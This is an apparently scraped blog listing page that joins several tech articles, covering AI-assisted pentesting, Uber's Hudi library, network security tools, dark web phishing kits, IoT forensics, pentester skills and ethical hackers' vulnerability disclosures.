types of financial fraud such as opening bank accounts and credit cards in the name of others. Cybercrime in a fast-paced technology landscape Today we see that cybercriminal activity has only gotten worse. As computer systems have gotten faster and more complex we see that the cybercriminal has become more sophisticated and harder to catch. Today we have botnets, which are a network of private computers that are infected with malicious software and allow the criminal element to control millions of infected computer systems across the globe. These botnets allow the criminal element to overload organizational networks and hide the origin of the criminals: We see constant ransomware attacks across all sectors of the economy People are constantly on the lookout for identity theft and financial fraud Continuous news reports regarding the latest point of sale attack against major retailers and hospitality organizations This is an extract from Information Security Handbook by Darren Death. Follow Darren on Twitter: @DarrenDeath. 
Read more
  • 0
  • 2
  • 14923
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-how-artificial-intelligence-can-improve-pentesting
Melisha Dsouza
21 Oct 2018
8 min read
Save for later

How artificial intelligence can improve pentesting

Melisha Dsouza
21 Oct 2018
8 min read
686 cybersecurity breaches were reported in the first three months of 2018 alone, with unauthorized intrusion accounting for 38.9% of incidents. And with high-profile data breaches dominating headlines, it’s clear that while modern, complex software architecture might be more adaptable and data-intensive than ever, securing that software is proving a real challenge. Penetration testing (or pentesting) is a vital component within the cybersecurity toolkit. In theory, it should be at the forefront of any robust security strategy. But it isn’t as simple as just rolling something out with a few emails and new software - it demands people with great skills, as well a culture where stress testing and hacking your own system is viewed as a necessity, not an optional extra. This is where artificial intelligence comes in - the automation that you can achieve through artificial intelligence could well help make pentesting much easier to do consistently and at scale. In turn, this would help organizations tackle both issues of skills and culture, and get serious about their cybersecurity strategies. But before we dive deeper into artificial intelligence and pentesting, let’s take a look at where we are now, and the shortcomings of established pentesting methods. The shortcomings of established methods of pentesting Typically, pentesting is carried out in 5 stages: Source: Incapsula Every one of these stages, when carried out by humans, opens up the chance of error. Yes, software is important, but contextual awareness and decisions are required.. This process, then, provides plenty of opportunities for error. From misinterpreting data - like thinking a system is secure, when actually it isn’t - to taking care of evidence and thoroughly and clearly recording the results of pentests, even the most experienced pentester will get things wrong. But even if you don’t make any mistakes, this whole process is hard to do well at scale. It requires a significant amount of time and energy to test a piece of software, which, given the pace of change created by modern processes, makes it much harder to maintain the levels of rigor you ultimately want from pentesting. This is where artificial intelligence comes in. The pentesting areas that artificial intelligence can impact Let’s dive into the different stages of pentesting that AI can impact. #1 Reconnaissance Stage The most important stage in pentesting is the Reconnaissance or information gathering stage. As rightly said by many in cybersecurity, "The more information gathered, the higher the likelihood of success." Therefore, a significant amount of time should be spent obtaining as much information as possible about the target. Using AI to automate this stage would provide accurate results as well as save a lot of time invested. Using a combination of Natural Language Processing, Computer Vision, and Artificial Intelligence, experts can identify a wide variety of details that can be used to build a profile of the company, its employees, the security posture, and even the software/hardware components of the network and computers. #2 Scanning Stage Comprehensive coverage is needed In the scanning phase. Manually scanning through thousands if systems in an organization is not ideal. NNor is it ideal to interpret the results returned by scanning tools. AI can be used to tweak the code of the scanning tools to scan systems as well as interpret the results of the scan. It can help save pentesters time and help in the overall efficiency of the pentesting process. AI can focus on test management and the creation of test cases automatically that will check if a particular program can be tagged having security flaw. They can also be used to check how a target system responds to an intrusion. #3 Gaining and Maintaining access stage Gaining access phase involves taking control of one or more network devices in order to either extract data from the target, or to use that device to then launch attacks on other targets. Once a system is scanned for vulnerabilities, the pentesters need to ensure that the system does not have any loopholes that attackers can exploit to get into the network devices. They need to check that the network devices are safely protected with strong passwords and other necessary credentials. AI-based algorithms can try out different combinations of passwords to check if the system is susceptible for a break-in. The algorithms can be trained to observe user data, look for trends or patterns to make inferences about possible passwords used. Maintaining access focuses on establishing other entry points to the target. This phase is expected to trigger mechanisms, to ensure that the penetration tester’s security when accessing the network. AI-based algorithms should be run at equal intervals to time to guarantee that the primary path to the device is closed. The algorithms should be able to discover backdoors, new administrator accounts, encrypted channels, new network access channels, and so on. #4 Covering Tracks And Reporting The last stage tests whether an attacker can actually remove all traces of his attack on the system. Evidence is most often stored in user logs, existing access channels, and in error messages caused by the infiltration process. AI-powered tools can assist in the discovery of hidden backdoors and multiple access points that haven't been left open on the target network; All of these findings should be automatically stored in a report with a proper timeline associated with every attack done. A great example of a tool that efficiently performs all these stages of pentesting is CloudSEK’s X-Vigil. This tool leverages AI to extract data, derive analysis and discover vulnerabilities in time to protect an organization from data breach. Manual vs automated vs AI-enabled pentesting Now that you have gone through the shortcomings of manual pen testing and the advantages of AI-based pentesting, let’s do a quick side-by-side comparison to understand the difference between the two.   Manual Testing Automated Testing AI enabled pentesting Manual testing is not accurate at all times due to human error This is more likely to return false positives AI enabled pentesting is accurate as compared to automated testing Manual testing is time-consuming and takes up human resources.   Automated testing is executed by software tools, so it is significantly faster than a manual approach.   AI enabled testing does not consume much time. The algorithms can be deployed for thousands of systems at a single instance. Investment is required for human resources.   Investment is required for testing tools. AI will save the investment for human resources in pentesting. Rather, the same employees can be used to perform less repetitive and more efficient tasks Manual testing is only practical when the test cases are run once or twice, and frequent repetition is not required..   Automated testing is practical when tools find test vulnerabilities out of programmable bounds AI-based pentesting is practical in organizations with thousands of systems that need to be tested at once to save time and resources.   AI-based pentesting tools Pentoma is an AI-powered penetration testing solution that allows software developers to conduct smart hacking attacks and efficiently pinpoint security vulnerabilities in web apps and servers. It identifies holes in web application security before hackers do, helping prevent any potential security damages. Pentoma analyzes web-based applications and servers to find unknown security risks.In Pentoma, with each hacking attempt, machine learning algorithms incorporate new vulnerability discoveries, thus continuously improving and expanding threat detection capability. Wallarm Security Testing is another AI based testing tool that discovers network assets, scans for common vulnerabilities, and monitors application responses for abnormal patterns. It discovers application-specific vulnerabilities via Automated Threat Verification. The content of a blocked malicious request is used to create a sanitized test with the same attack vector to see how the application or its copy in a sandbox would respond. With such AI based pentesting tools, pentesters can focus on the development process itself, confident that applications are secured against the latest hacking and reverse engineering attempts, thereby helping to streamline a product’s time to market. Perhaps it is the increase in the number of costly data breaches or the continually expanding attack and proliferation of sensitive data and the attempt to secure them with increasingly complex security technologies that businesses lack in-house expertise to properly manage. Whatever be the reason, more organizations are waking up to the fact that if vulnerabilities are not caught in time can be catastrophic for the business. These weaknesses, which can range from poorly coded web applications, to unpatched databases to exploitable passwords to an uneducated user population, can enable sophisticated adversaries to run amok across your business.  It would be interesting to see the growth of AI in this field to overcome all the aforementioned shortcomings. 5 ways artificial intelligence is upgrading software engineering Intelligent Edge Analytics: 7 ways machine learning is driving edge computing adoption in 2018 8 ways Artificial Intelligence can improve DevOps
Read more
  • 0
  • 0
  • 12419

article-image-why-uber-created-hudi-an-open-source-incremental-processing-framework-on-apache-hadoop
Bhagyashree R
19 Oct 2018
3 min read
Save for later

Why did Uber created Hudi, an open source incremental processing framework on Apache Hadoop?

Bhagyashree R
19 Oct 2018
3 min read
In the process of rebuilding its Big Data platform, Uber created an open-source Spark library named Hadoop Upserts anD Incremental (Hudi). This library permits users to perform operations such as update, insert, and delete on existing Parquet data in Hadoop. It also allows data users to incrementally pull only the changed data, which significantly improves query efficiency. It is horizontally scalable, can be used from any Spark job, and the best part is that it only relies on HDFS to operate. Why is Hudi introduced? Uber studied its current data content, data access patterns, and user-specific requirements to identify problem areas. This research revealed the following four limitations: Scalability limitation in HDFS Many companies who use HDFS to scale their Big Data infrastructure face this issue. Storing large numbers of small files can affect the performance significantly as HDFS is bottlenecked by its NameNode capacity. This becomes a major issue when the data size grows above 50-100 petabytes. Need for faster data delivery in Hadoop Since Uber operates in real time, there was a need for providing services the latest data. It was important to make the data delivery much faster, as the 24-hour data latency was way too slow for many of their use cases. No direct support for updates and deletes for existing data Uber used snapshot-based ingestion of data, which means a fresh copy of source data was ingested every 24 hours. As Uber requires the latest data for its business, there was a need for a solution which supports update and delete operations for existing data. However, since their Big Data is stored in HDFS and Parquet, direct support for update operations on existing data is not available. Faster ETL and modeling ETL and modeling jobs were also snapshot-based, requiring their platform to rebuild derived tables in every run. ETL jobs also needed to become incremental to reduce data latency. How Hudi solves the aforementioned limitations? The following diagram shows Uber's Big Data platform after the incorporation of Hudi: Source: Uber Regardless of whether the data updates are new records added to recent date partitions or updates to older data, Hudi allows users to pass on their latest checkpoint timestamp and retrieve all the records that have been updated since. This data retrieval happens without running an expensive query that scans the entire source table. Using this library Uber has moved to an incremental ingestion model leaving behind the snapshot-based ingestion. As a result, the data latency was reduced from 24 hrs to less than one hour. To know about Hudi in detail, check out Uber’s official announcement. How can Artificial Intelligence support your Big Data architecture? Big data as a service (BDaaS) solutions: comparing IaaS, PaaS and SaaS Uber’s Marmaray, an Open Source Data Ingestion and Dispersal Framework for Apache Hadoop
Read more
  • 0
  • 0
  • 11378

article-image-top-5-cybersecurity-assessment-tools-for-networking-professionals
Savia Lobo
07 Jun 2018
6 min read
Save for later

Top 5 cybersecurity assessment tools for networking professionals

Savia Lobo
07 Jun 2018
6 min read
Security is one of the major concerns while setting up data centers in the cloud. Although firewalls and managed networking components are deployed by most of the organizations for their data centers, they still fear being attacked by intruders. As such, organizations constantly seek tools that can assist them in gauging how vulnerable their network is and how they can secure their applications therein. Many confuse security assessment with penetration testing and also use it interchangeably. However, there is a notable difference between the two. Security assessment is a process of finding out the different vulnerabilities within a system and prioritize them based on severity and business criticality. On the other hand, penetration testing simulates a real-life attack and maps out paths that a real attacker would take to fulfill the attack. You can check out our article, Top 5 penetration testing tools for ethical hackers to know about some of the pentesting tools. Plethora of tools in the market exist and every tool claims to be the best. Here is our top 5 list of tools to secure your organization over the network. Wireshark Wireshark is one of the popular tools for packet analysis. It is open source under GNU General Public License. Wireshark has a user-friendly GUI  and supports Command Line Input (CLI). It is a great debugging tool for developers who wish to develop a network application. It runs on multiple platforms including Windows, Linux, Solaris, NetBSD, and so on. WireShark community also hosts SharkFest, launched in 2008, for WireShark developers and the user communities. The main aim of this conference is to support Wireshark development and to educate current and future generations of computer science and IT professionals on how to use this tool to manage, troubleshoot, diagnose, and secure traditional and modern networks. Some benefits of using this tool include: Wireshark features live real-time traffic analysis and also supports offline analysis. Depending on the platform, one can read live data from Ethernet, PPP/HDLC, USB, IEEE 802.11, Token Ring, and many others. Decryption support for several protocols such as IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2 Network captured by this tool can be browsed via a GUI, or via the TTY-mode TShark utility. Wireshark also has the most powerful display filters in whole industry It also provides users with Tshark, a network protocol analyzer, used to analyze packets from the hosts without a UI. Nmap Network Mapper, popularly known as Nmap is an open source licensed tool for conducting network discovery and security auditing.  It is also utilized for tasks such as network inventory management, monitoring host or service uptime, and much more. How Nmap works is, it uses raw IP packets in order to find out the available hosts on the network, the services they offer, the OS on which they are operating, the firewall that they are currently using and much more. Nmap is a quick essential to scan large networks and can also be used to scan single hosts. It runs on all major operating system. It also provides official binary packages for Windows, Linux, and Mac OS X. It also includes Zenmap - An advanced security scanner GUI and a results viewer Ncat - This is a tool used for data transfer, redirection, and debugging. Ndiff - A utility tool for comparing scan results Nping - A packet generation and response analysis tool Nmap is traditionally a command-line tool run from a Unix shell or Windows Command prompt. This makes Nmap easy for scripting and allows easy sharing of useful commands within the user community. With this, experts do not have to move through different configuration panels and scattered option fields. Nessus Nessus, a product of the Tenable.io, is one of the popular vulnerability scanners specifically for UNIX systems. This tool remains constantly updated with 70k+ plugins. Nessus is available in both free and paid versions. The paid version costs around  $2,190 per year, whereas the free version, ‘Nessus Home’ offers limited usage and is licensed only for home network usage. Customers choose Nessus because It includes simple steps for policy creation and needs just a few clicks for scanning an entire corporate network. It offers vulnerability scanning at a low total cost of ownership (TCO) product One can carry out a quick and accurate scanning with lower false positives. It also has an embedded scripting language for users to write their own plugins and to understand the existing ones. QualysGuard QualysGuard is a famous SaaS (Software-as-a-Service) vulnerability management tool. It has a comprehensive vulnerability knowledge base, using which it is able to provide continuous protection against the latest worms and security threats. It proactively monitors all the network access points, due to which security managers can invest less time to research, scan, and fix network vulnerabilities. This helps organizations in avoiding network vulnerabilities before they could be exploited. It provides a detailed technical analysis of the threats via powerful and easy-to-read reports. The detailed report includes the security threat, the consequences faced if the vulnerability is exploited, and also a solution that recommends how the vulnerability can be fixed. One can get a summary of the overall security with QualysGuard’s executive dashboard. The dashboard displays a number of new, active, and re-opened vulnerabilities. It also displays a graph which showcases vulnerabilities based on severity level. Get to know more about QualysGuard on its official website. Core Impact Core Impact is widely used as a comprehensive tool to assess and test security vulnerability within any organization. It includes a large database of professional exploits and is regularly updated. It assists in cleanly exploiting one machine and later creating an encrypted tunnel through it to exploit other machines. Core Impact provides a controlled environment to mimic bad attacks. This helps one to secure their network before the occurrence of an actual attack. One interesting feature of Core Impact is that one can fully test their network, irrespective of the length, quickly and efficiently. These are five popular tools network security professionals use for assessing their networks. However, there are many other tools such as Netsparker, OpenVAS, Nikto, and many more for assessing the security of their network. Every security assessment tool is unique in its own way. However, it all boils down to one’s own expertise and the experience they have, and also the kind of project environment it is used in. Top 5 penetration testing tools for ethical hackers Intel’s Spectre variant 4 patch impacts CPU performance Pentest tool in focus: Metasploit
Read more
  • 0
  • 0
  • 10859

article-image-dark-web-phishing-kits-cheap-plentiful-and-ready-to-trick-you
Guest Contributor
07 Dec 2018
6 min read
Save for later

Dark Web Phishing Kits: Cheap, plentiful and ready to trick you

Guest Contributor
07 Dec 2018
6 min read
Spam email is a part of daily life on the internet. Even the best junk mail filters will still allow through certain suspicious looking messages. If an illegitimate email tries to persuade you to click a link and enter personal information, then it is classified as a phishing attack. Phishing attackers send out email blasts to large groups of people with the messages designed to look like they come from a reputable company, such as Google, Apple, or a banking or credit card firm. The emails will typically try to warn you about an error with your account and then urge you to click a link and log in with your credentials. Doing so will bring you to an imitation website where the attacker will attempt to steal your password, social security number, or other private data. These days phishing attacks are becoming more widespread. One of the primary reasons is because of easy access to cybercrime kits on the dark web. With the hacker community growing, internet users need to take privacy seriously and remain vigilant against spam and other threats. Read on to learn more about this trend and how to protect yourself. Dark Web Basics The dark web, sometimes referred to as the deep web, operates as a separate environment on the internet. Normal web browsers, like Google Chrome or Mozilla Firefox, connect to the world wide web using the HTTP protocol. The dark web requires a special browser tool known as the TOR browser, which is fully encrypted and anonymous. Image courtesy of Medium.com Sites on the dark web cannot be indexed by search engines, so you'll never stumble on that content through Google. When you connect through the TOR browser, all of your browsing traffic is sent through a global overlay network so that your location and identity cannot be tracked. Even IP addresses are masked on the dark web. Hacker Markets Much of what takes place in this cyber underworld is illegal or unethical in nature, and that includes the marketplaces that exist there. Think of these sites as blackmarket versions of eBay, where anonymous individuals can buy and sell illegal goods and services. Recently, dark web markets have seen a surge in demands for cybercrime tools and utilities. Entire phishing kits are sold to buyers, which include spoofed pages that imitate real companies and full guides on how to launch an email phishing scam. Image courtesy of Medium.com When a spam email is sent out as part of a phishing scam, the messages are typically delivered through dark web servers that make it hard for junk filters to identify. In addition, the "From" address in the emails may look legitimate and use a valid domain like @gmail.com. Phishing kits can be found for as less as two dollars, meaning that inexperienced hackers can launch a cybercrime effort with little funding or training. It’s interesting to note that personal data prices at the Dark Web supermarket range from a single dollar (Social Security card) to thousands (medical records). Cryptocurrency Scandal You should be on the lookout for phishing scandals related to any company or industry, but in particular, banking and financial attacks can be the most dangerous. If a hacker gains access to your credit card numbers or online banking password, then can commit fraud or even steal your identity. The growing popularity of cryptocurrencies like Bitcoin and Ether have revolutionized the financial industry, but as a negative result of the trend, cybercriminals are now targeting these digital money systems. MyEtherWallet website, which allows users to store blockchain currency in a central location, has been victim to a number of phishing scams in recent months. Image courtesy ofMyEtherWallet.com Because cryptocurrencies do not operate with a central bank or financial authority, you may not know what a legitimate email alert for one looks like. Phishing messages for MyEtherWallet will usually claim that there is an issue with your cryptocurrency account, or sometimes even suggest that you have a payment pending that needs to be verified. Clicking on the link in the phishing email will launch your web browser and navigate to a spoofed page that looks like it is part of myetherwallet.com. However, the page is actually hosted on the hacker's network and will feed directly into their illegitimate database. If you enter your private wallet address, which is a unique string of letters and numbers, the hacker can gain access to all of the funds in your account. Preventative Measures Phishing attacks are a type of cybercrime that targets individuals, so it's up to you to be on guard for these messages and react appropriately. The first line of defense against phishing is to be skeptical of all emails that enter your inbox. Dark web hackers are getting better and better at imitating real companies with their spam and spoofing pages, so you need to look closely when examining the content. Always check the full URL of the links in email messages before you click one. If you do get tricked and end up navigating to a spoofed page in your web browser, you still have a chance to protect yourself. All browsers support secure sockets layer (SSL) functionality and will display a lock icon or a green status bar at the top of the window when a website has been confirmed as legitimate. If you navigate to a webpage from an email that does not have a valid SSL certificate, you should close the browser immediately and permanently delete the email message. The Bottom Line Keep this in mind. As prices for phishing kits drop and supply increases, the allure of engaging in this kind of bad behavior will be too much to resist for an increasing number of people. Expect incidents of phishing attempts will increase. The general internet-browsing public should stay on high alert at all times when navigating their email inbox. Think first, then click. Author Bio Gary Stevens is a front-end developer. He’s a full-time blockchain geek and a volunteer working for the Ethereum foundation as well as an active Github contributor. Packt has put together a new cybersecurity bundle for Humble Bundle Malicious code in npm ‘event-stream’ package targets a bitcoin wallet and causes 8 million downloads in two months Why scepticism is important in computer security: Watch James Mickens at USENIX 2018 argue for thinking over blindly shipping code
Read more
  • 0
  • 0
  • 10484
article-image-iot-forensics-security-connected-world
Vijin Boricha
01 May 2018
3 min read
Save for later

IoT Forensics: Security in an always connected world where things talk

Vijin Boricha
01 May 2018
3 min read
Connected physical devices, home automation appliances, and wearable devices are all part of Internet of Things (IoT). All of these have two major things in common that is seamless connectivity and massive data transfer. This also brings with it, plenty of opportunities for massive data breaches and allied cyber security threats. The motive of digital forensics is to identify, collect, analyse, and present digital evidence collected from various mediums in a cybercrime incident. The multiplication of IoT devices and the increased number of cyber security incidents has given birth to IoT forensics. IoT forensics is a branch of digital forensics which deals with IoT-related cybercrimes and includes investigation of connected devices, sensors and the data stored on all possible platforms. If you look at the bigger picture, IoT forensics is a lot more complex, multifaceted and multidisciplinary in approach than traditional forensics. With versatile IoT devices, there is no specific method of IoT forensics that can be broadly used.So identifying valuable sources is a major challenge. The entire investigation will depend on the nature of the connected or smart device in place. For example, evidence could be collected from fixed home automation sensors, or moving automobile sensors, wearable devices or data store on Cloud. When compared to the standard digital forensic techniques, IoT forensics portrays multiple challenges depending on the versatility and complexity of the IoT devices. Following are some challenges that one may face in an investigation: Variance of the IoT devices Proprietary Hardware and Software Data present across multiple devices and platforms Data can be updated, modified, or lost Proprietary jurisdictions for data is stored on cloud or a different geography As such, IoT Forensics requires a multi-faceted approach where evidence can be collected from various sources. We can categorize sources of evidence into three broad groups: Smart devices and sensors; Gadgets present at the crime scene (Smartwatch, home automation appliances, weather control devices, and more) Hardware and Software; the communication link between smart devices and the external world (computers, mobile, IPS, and firewalls) External resources; areas outside the network unders investigation (Cloud, social networks, ISPs and mobile network providers) Once the evidence is successfully collected from an IoT device no matter the file system, operating system, or the platform it is based on, it should be logged and monitored. The main reason behind this is IoT devices data storage are majorly on Cloud due to its scalability and accessibility. There are high possibilities the data on Cloud can be altered which would result to an investigation failure. No doubt Cloud forensics can equally play an important role here but strengthening cyber security best practices should be the ideal motive. With ever evolving IoT devices there will always be a need for unique practice methods and techniques to break through the investigation. Cybercrime keeps evolving and getting bolder by the day. Forensics experts will have to develop skill sets to deal with the variety and complexity of IoT devices to keep up with this evolution. No matter the challenges one faces there is always a unique solution to complex problems. There will always be a need for unique, intelligent, and adaptable techniques to investigate IoT-related crimes and an even greater need for those displaying these capabilities. To learn more on IoT security, you can get you hands on a few of our books; IoT Penetration Testing Cookbook and Practical Internet of Things Security. Why Metadata is so important for IoT Why the Industrial Internet of Things (IIoT) needs Architects 5 reasons to choose AWS IoT Core for your next IoT project  
Read more
  • 0
  • 0
  • 10441

article-image-essential-skills-penetration-testing
Hari Vignesh
11 Jun 2017
6 min read
Save for later

Essential skills for penetration testing

Hari Vignesh
11 Jun 2017
6 min read
Cybercriminals are continally developing new and more sophisticated ways to exploit software vulnerabilities, making it increasingly difficult to defend our systems. Today, then, we need to be proactive in how we protect our digital properties. That's why penetration testers are so in demand. Although risk analysis can easily be done by internal security teams, support from skilled penetration testers can be the difference between security and vulnerability. These highly trained professionals can “think like the enemy” and employ creative ways to identify problems before they occur, going beyond the use of automated tools. Pentesters can perform technological offensives, but also simulate spear phishing campaigns to identify weak links in the security posture of the companies and pinpoint training needs. The human element is essential to simulate a realistic attack and uncover all of the infrastructure’s critical weaknesses. Being a pen tester can be financially rewarding because trained and skilled ones can normally secure good wages. Employers are willing to pay top dollar to attract and retain talent. Most pen testers enjoy sizable salaries depending on where they live and their level of experience and training. According to a PayScale salary survey, the average salary is approximately $78K annually, ranging from $44K to $124K on the higher end. To be a better pen tester, you need to upgrade or master your art in certain aspects. The following skills will make you stand out in the crowd and will make you a better and more effective pen tester. I know what you’re thinking. This seems like an awful lot of work learning penetration testing, right? Wrong. You can still learn how to penetration test and become a penetration tester without these things, but learning all of these things will make it easier and help you understand both how and why things are done a certain way. Bad pen testers know that things are vulnerable. Good pen testers know how things are vulnerable. Great pen testers know why things are vulnerable. Mastering command-line If you notice that even in modern hacker films and series, the hackers always have a little black box on the screen with text going everywhere. It’s a cliché but it’s based in reality. Hackers and penetration testers alike use the command line a lot. Most of the tools are normally command line based. It’s not showing off, it’s just the most efficient way to do our jobs. If you want to become a penetration tester you need to be at the very least, comfortable with a DOS or PowerShell prompt or terminal. The best way to develop this sort of skillset is to learn how to write DOS Batch or PowerShell scripts. There are various command line tools that make the life of a pen-tester easy. So learning to use those tools and mastering them will enable you to pen-test your environment efficiently. Mastering OS concepts If you look at penetration testing or hacking sites and tutorials, there’s a strong tendency to use Linux. If you start with something like Ubuntu, Mint or Fedora or Kali as a main OS and try to spend some time tinkering under the hood, it’ll help you become more familiar with the environment. Setting up a VM to install and break into a Linux server is a great way to learn. You wouldn’t expect to be able to comfortably find and exploit file permission weaknesses if you don’t understand how Linux file permissions work, nor should you expect to be able to exploit the latest vulnerabilities comfortably and effectively without understanding how they affect a system. A basic understanding of Unix file permissions, processes, shell scripting, and sockets will go a long way. Mastering networking and protocols to the packet level TCP/IP seems really scary at first, but the basics can be learned in a day or two. While breaking in you can use a packet sniffing tool called Wireshark to see what’s really going on when they send traffic to a target instead of blindly accepting documented behavior without understanding what’s happening. You’ll also need to know not only how HTTP works over the wire, but also you’ll need to understand the Document Object Model (DOM) and enough knowledge about how backends work to then, further understand how web-based vulnerabilities occur. You can become a penetration tester without learning a huge volume of things, but you’ll struggle and it’ll be a much less rewarding career. Mastering programming If you can’t program then you’re at risk of losing out to candidates who can. At best, you’re possibly going to lose money from that starting salary. Why? You would require sufficient knowledge in a programming language to understand the source code and find a vulnerability in it. For instance, only if you know PHP and how it interacts with a database, will you be able to exploit SQL injection. Your prospective employer is going to need to give you time to learn these things if they’re going to get the most out of you. So don’t steal money from your own career, learn to program. It’s not hard. Being able to program means you can write tools, automate activities, and be far more efficient. Aside from basic scripting you should ideally become at least semi-comfortable with one programming languageand cover the basics in another. Web people like Ruby. Python is popular amongst reverse engineers. Perl is particularly popular amongst hardcore Unix users. You don’t need to be a great programmer, but being able to program is worth its weight in goldand most languages have online tutorials to get you started. Final thoughts Employers will hire a bad junior tester if they have to, and a good junior tester if there’s no one better, but they’ll usually hire a potentially great junior pen tester in a heartbeat. If you don’t spend time learning the basics to make yourself a great pen tester, you’re stealing from your own potential salary. If you’re missing some or all of the things above, don’t be upset. You can still work towards getting a job in penetration testing and you don’t need to be an expert in any of these things. They’re simply technical qualities that make you a much better candidate for being (and probably better paid) hired from a hiring manager and supporting interviewer’s perspective. About the author Hari Vignesh Jayapalan is a Google Certified Android app developer, IDF Certified UI & UX Professional, street magician, fitness freak, technology enthusiast, and wannabe entrepreneur. He can be found on Twitter @HariofSpades.
Read more
  • 0
  • 0
  • 9541

article-image-10-times-ethical-hackers-spotted-a-software-vulnerability-and-averted-a-crisis
Savia Lobo
30 Sep 2019
12 min read
Save for later

10 times ethical hackers spotted a software vulnerability and averted a crisis

Savia Lobo
30 Sep 2019
12 min read
A rise in multiple cyber-attacks and the lack of knowledge and defenses to tackle them has made it extremely important for companies to use ethical hacking to combat hackers. While Black Hat hackers use their skills for malicious purposes to defraud high-profile companies or personalities, Ethical Hackers or White Hat hackers use the same techniques (penetration testing, different password cracking methods or social engineering) to break into a company’s cyber defense but to help companies fix these vulnerabilities or loose ends to strengthen their systems. Ethical hackers are employed directly by the company’s CTO or the management with a certain level of secrecy without the knowledge of the staff or other cybersecurity teams. Ethical hacking can also be crowdsourced through bug bounty programs (BBP) and via responsible disclosure (RP). There are multiple examples in just the past couple of years where ethical hackers have come to the rescue of software firms to avert a crisis that would have potentially incurred the organizations huge losses and put their product users in harm’s way. 10 instances where ethical hackers saved the day for companies with software vulnerabilities 1. An ethical hacker accessed Homebrew’s GitHub repo in under 30 minutes On 31st July 2018, Eric Holmes, a security researcher reported that he could easily gain access to Homebrew’s GitHub repo. Homebrew is a popular, free and open-source software package management system with well-known packages like node, git, and many more, and also simplifies the installation of software on macOS. Under 30 minutes, Holmes gained access to an exposed GitHub API token that opened commit access to the core Homebrew repo; thus, exposing the entire Homebrew supply chain. On July 31, Holmes first reported this vulnerability to Homebrew’s developer, Mike McQuaid. Following which, McQuaid publicly disclosed the issue on Homebrew blog on August 5, 2018. After receiving the report, within a few hours the credentials had been revoked, replaced and sanitized within Jenkins so they would not be revealed in the future. In a detailed post about the attack invasion on Medium, Eric mentioned that if he were a malicious actor, he could easily make a small unnoticed change to the openssl formulae, placing a backdoor on any machine that installed it. 2. Zimperium zLabs security researcher disclosed a critical vulnerability in multiple high-privileged Android services to Google In mid-2018, Tamir Zahavi-Brunner, Security Researcher at Zimperium zLabs, informed Google of a critical vulnerability affecting multiple privileged Android services. This vulnerability was found in a library, hidl_memory, introduced specifically as part of Project Treble and does not exist in a previous library which does pretty much the same thing. The vulnerability was in a commonly used library affecting many high-privileged services. The hidl_memory comprises of: mHandle (HIDL object which holds file descriptors, mSize (size of the memory to be shared), mName (represents the type of memory). These structures are transferred through Binder in HIDL, where complex objects (like hidl_handle or hidl_string) have their own custom code for writing and reading the data. Transferring structures via 64-bit processes cause no issues, however, this size gets truncated to 32 bit in 32-bit processes, so only the lower 32 bits are used. So if a 32-bit process receives a hidl_memory whose size is bigger than UINT32_MAX (0xFFFFFFFF), the actually mapped memory region will be much smaller. Google designated this vulnerability as CVE-2018-9411 and patched it in the July security update (2018-07-01 patch level), including additional patches in the September security update (2018-09-01 patch level). Brunner later published a detailed post explaining technical details of the vulnerability and the exploit, in October 2018. 3. A security researcher revealed a vulnerability in a WordPress plugin that leaked the Twitter account information of users Early this year, on January 17, a French security researcher, Baptiste Robert, popularly known by his online handle, Elliot Alderson found a vulnerability in a WordPress plugin called Social Network Tabs. This vulnerability was assigned with the vulnerability ID- CVE-2018-20555  by MITRE. The plugin leaked a user’s Twitter account info thus exposing the personal details to be compromised. The plugin allowed websites to help users share content on social media sites. Elliot informed Twitter of this vulnerability on December 1, 2018, prompting Twitter to revoke the keys, rendering the accounts safe again. Twitter also emailed the affected users of the security lapse of the WordPress plugin but did not comment on the record when reached. 4. A Google vulnerability researcher revealed an unpatched bug in Windows’ cryptographic library that could take down an entire Windows fleet On June 11, 2019, Tavis Ormandy, a vulnerability researcher at Google, revealed a security issue in SymCrypt, the core cryptographic library for Windows. The vulnerability could take down an entire Windows fleet relatively easily, Ormandy said. He reported the vulnerability on March 13 on Google’s Project Zero site and got a response from Microsoft saying that it would issue a security bulletin and fix for this in the June 11 Patch Tuesday run. Further on June 11, he received a message from Microsoft Security Response Center (MSRC) saying “that the patch won’t ship today and wouldn’t be ready until the July release due to issues found in testing”. Ormandy disclosed the vulnerability a day after the 90-day deadline elapsed. This was in line with Google’s 90 days deadline for fixing or publicly disclosing bugs that its researchers find. 5. Oracle’s critical vulnerability in its WebLogic servers On June 17, this year, Oracle published an out-of-band security update that had a patch to a critical code-execution vulnerability in its WebLogic server. The vulnerability was brought to light when it was reported by the security firm, KnownSec404. The vulnerability tracked as CVE-2019-2729, has received a Common Vulnerability Scoring System score of 9.8 out of 10. The vulnerability was a deserialization attack targeting two Web applications that WebLogic appears to expose to the Internet by default—wls9_async_response and wls-wsat.war. 6. Security flaws in Boeing 787 Crew Information System/Maintenance System (CIS/MS) code can be misused by hackers At the Black Hat 2019, Ruben Santamarta, an IOActive Principal Security Consultant in his presentation said that there were vulnerabilities in the Boeing 787 Dreamliner’s components, which could be misused by hackers. The security flaws were in the code for a component known as a Crew Information Service/Maintenance System. Santamarta identified three networks in the 787, the Open Data Network (ODN), the Isolated Data Network (IDN), and the Common Data Network (CDN). Boeing, however, strongly disagreed with Santamarta’s findings saying that such an attack is not possible and rejected Santamarta’s “claim of having discovered a potential path to pull it off.” He further highlighted a white paper released in September 2018 that mentioned that a publicly accessible Boeing server was identified using a simple Google search, exposing multiple files. On further analysis, the exposed files contained parts of the firmware running on the Crew Information System/Maintenance System (CIS/MS) and Onboard Networking System (ONS) for the Boeing 787 and 737 models respectively. These included documents, binaries, and configuration files. Also, a Linux-based Virtual Machine used to allow engineers to access part of the Boeing’s network access was also available. A reader on Bruce Schneier’s (public-interest technologist) blog post argued that Boeing should allow SantaMarta’s team to conduct a test, for the betterment of the passengers, “I really wish Boeing would just let them test against an actual 787 instead of immediately dismissing it. In the long run, it would work out way better for them, and even the short term PR would probably be a better look.” Boeing in a statement said, "Although we do not provide details about our cybersecurity measures and protections for security reasons, Boeing is confident that its airplanes are safe from cyberattack.” Boeing says it also consulted with the Federal Aviation Administration and the Department of Homeland Security about Santamarta's attack. While the DHS didn't respond to a request for comment, an FAA spokesperson wrote in a statement to WIRED that it's "satisfied with the manufac­turer’s assessment of the issue." Santamarta's research, despite Boeing's denials and assurances, should be a reminder that aircraft security is far from a solved area of cybersecurity research. 